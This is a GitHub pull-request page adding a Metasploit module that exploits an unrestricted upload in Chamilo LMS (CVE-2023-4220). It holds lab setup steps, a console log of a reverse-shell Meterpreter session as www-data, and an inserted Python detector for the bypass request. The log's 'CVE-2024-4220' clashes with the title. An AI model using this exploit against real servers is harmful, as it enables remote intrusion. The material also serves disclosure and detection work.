
Chamilo v1.11.24 Unrestricted File Upload (CVE-2023-4220) #19629

Merged: 3 commits into rapid7:master on Dec 4, 2024

Conversation

@jheysel-r7 (Contributor) commented Nov 11, 2024

Chamilo LMS is a free software e-learning and content management system. In versions <= v1.11.24, a webshell can be uploaded via the bigload.php endpoint. If the GET request parameter action is set to post-unsupported, file extension checks are skipped, allowing attacker-controlled .php files to be uploaded to /main/inc/lib/javascript/bigupload/files/ if the /files/ directory already exists (it does not exist by default).

Setup

A vulnerable docker-compose configuration can be found at the following link: vulhub/vulhub#559

  1. Clone the repo: git clone https://github.com/vulhub/vulhub.git
  2. Checkout the pull request mentioned above: git checkout CVE-2023-4220
  3. Run cd vulhub/chamilo/CVE-2023-4220
  4. Start the environment: docker compose up
  5. Navigate to http://127.0.0.1:8080 to complete the installation wizard.
  6. Note when filling out the database IP address and credentials: the DB hostname is the name of the container, which is mariadb (not localhost or 127.0.0.1).
  7. Once the installation wizard is complete, the target should be ready to be exploited with the module. This container has the non-default /files/ directory created already.

Verification

List the steps needed to make sure this thing works

  1. Start msfconsole
  2. Do: use linux/http/chamilo_bigupload_webshell
  3. Set the RHOST, RPORT, and LHOST options
  4. Run the module
  5. Receive a Meterpreter session as the www-data user.
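Detection logic for the behaviour described in the PR text above, added here as an example; it is not part of the pull request or of the Metasploit module. It parses combined-format web server log lines (constructed samples, not real traffic) and flags the three conditions the description and the module output name: a request under the bigupload directory carrying action=post-unsupported, a request for a .php file inside the files/ directory, and the non-default files/ directory answering a probe with anything other than 404. The sample places bigload.php directly under the bigupload directory, which is an assumption (the PR gives only the script name and the parent directory), so matching is done on the directory plus the action parameter rather than on the script name.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Directory names taken from the PR text. The exact script path of bigload.php is
# not given there, so detection keys on the directory and the action parameter.
BIGUPLOAD_DIR = "/main/inc/lib/javascript/bigupload/"
UPLOAD_DIR = BIGUPLOAD_DIR + "files/"

# Combined log format (Apache/nginx): client ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (not real traffic). Lines 1-2 model the bypass upload
# and a follow-up request to the dropped file (name taken from the module output
# above); line 3 models a probe of files/ that answers 200; line 4 is an ordinary
# upload with a different action value (assumed); line 5 is a probe answered 404.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Dec/2024:12:50:00 +0000] "POST /main/inc/lib/javascript/bigupload/bigload.php?action=post-unsupported HTTP/1.1" 200 31 "-" "python-requests/2.31"
203.0.113.7 - - [04/Dec/2024:12:50:01 +0000] "GET /main/inc/lib/javascript/bigupload/files/DEyYYuoivfzUFvHx.php HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.3 - - [04/Dec/2024:12:51:00 +0000] "GET /main/inc/lib/javascript/bigupload/files/ HTTP/1.1" 200 0 "-" "curl/8.4.0"
192.0.2.10 - - [04/Dec/2024:12:52:00 +0000] "POST /main/inc/lib/javascript/bigupload/bigload.php?action=upload HTTP/1.1" 200 31 "-" "Mozilla/5.0"
192.0.2.11 - - [04/Dec/2024:12:53:00 +0000] "GET /main/inc/lib/javascript/bigupload/files/ HTTP/1.1" 404 0 "-" "curl/8.4.0"
"""


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    parts = urlsplit(fields["target"])
    fields["path"] = parts.path
    # Keep the first value of each query parameter.
    fields["query"] = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return fields


def classify(fields):
    """Map one parsed request to a detection name, or None if it is not suspicious."""
    path = fields["path"].lower()
    action = fields["query"].get("action", "").lower()
    if path.startswith(BIGUPLOAD_DIR) and action == "post-unsupported":
        # The extension-check bypass the PR describes: an upload handler under the
        # bigupload directory invoked with action=post-unsupported.
        return "bigupload_extension_bypass"
    if path.startswith(UPLOAD_DIR) and path.endswith(".php"):
        # A PHP file being requested from the writable upload directory.
        return "php_in_bigupload_files_dir"
    if path == UPLOAD_DIR and fields["status"] != "404":
        # The non-default files/ directory answering a probe; the module's own
        # check treats its existence as the vulnerable condition.
        return "bigupload_files_dir_exposed"
    return None


def scan(log_text):
    """Return (rule, client_ip, method, path, status) for every flagged line."""
    findings = []
    for line in log_text.splitlines():
        fields = parse_line(line)
        if fields is None:
            continue
        rule = classify(fields)
        if rule:
            findings.append((rule, fields["ip"], fields["method"],
                             fields["path"], fields["status"]))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

The third rule is the cheapest one to act on: the PR states the files/ directory does not exist by default, so on an installation that has not been deliberately configured to use it, any non-404 answer for that path is itself worth a ticket, independent of whether an upload has been attempted.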

@adfoster-r7 adfoster-r7 self-assigned this Nov 11, 2024
@jheysel-r7 jheysel-r7 changed the title CVE-2023:4220: Chamilo v1.11.24 Unrestricted File Upload Chamilo v1.11.24 Unrestricted File Upload (CVE-2023:4220) Nov 11, 2024
@jheysel-r7 jheysel-r7 changed the title Chamilo v1.11.24 Unrestricted File Upload (CVE-2023:4220) Chamilo v1.11.24 Unrestricted File Upload (CVE-2023-4220) Nov 12, 2024
@jheysel-r7 jheysel-r7 linked an issue Nov 12, 2024 that may be closed by this pull request
@adfoster-r7 adfoster-r7 removed their assignment Nov 12, 2024
@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Nov 25, 2024
@dledda-r7 dledda-r7 self-assigned this Dec 2, 2024
@dledda-r7 (Contributor) left a comment

Looks good!

msf6 exploit(linux/http/chamilo_bigupload_webshell) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(linux/http/chamilo_bigupload_webshell) > set rport 8080
rport => 8080
msf6 exploit(linux/http/chamilo_bigupload_webshell) > exploit

[*] Started reverse TCP handler on 172.21.111.143:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The directory /main/inc/lib/javascript/bigupload/files/ exists on the target indicating the target is vulnerable.
[+] The target is vulnerable. File upload was successful (CVE-2024-4220 was exploited successfully).
[*] Sending stage (40004 bytes) to 172.18.0.3
[+] Deleted D73uPl0z
[+] Deleted DEyYYuoivfzUFvHx.php
[*] Meterpreter session 1 opened (172.21.111.143:4444 -> 172.18.0.3:48560) at 2024-12-04 07:50:01 -0500


meterpreter > 
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : 345de2434c3a
OS          : Linux 345de2434c3a 6.11.2-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.11.2-1kali1 (2024-10-15) x86_64
Meterpreter : php/linux
meterpreter > ls
No entries exist in /var/www/chamilo/main/inc/lib/javascript/bigupload/files
meterpreter > 

@dledda-r7 dledda-r7 merged commit ab2ca41 into rapid7:master Dec 4, 2024
38 checks passed
@dledda-r7 (Contributor) commented Dec 4, 2024

Release Notes

This adds an exploit module for Chamilo LMS, where in versions <= v1.11.24 a webshell can be uploaded via the bigload.php endpoint, allowing remote code execution in the context of www-data (CVE-2023-4220).

Linked issue (may be closed by this pull request): Chamilo v1.11.24 Unrestricted File Upload PHP Webshell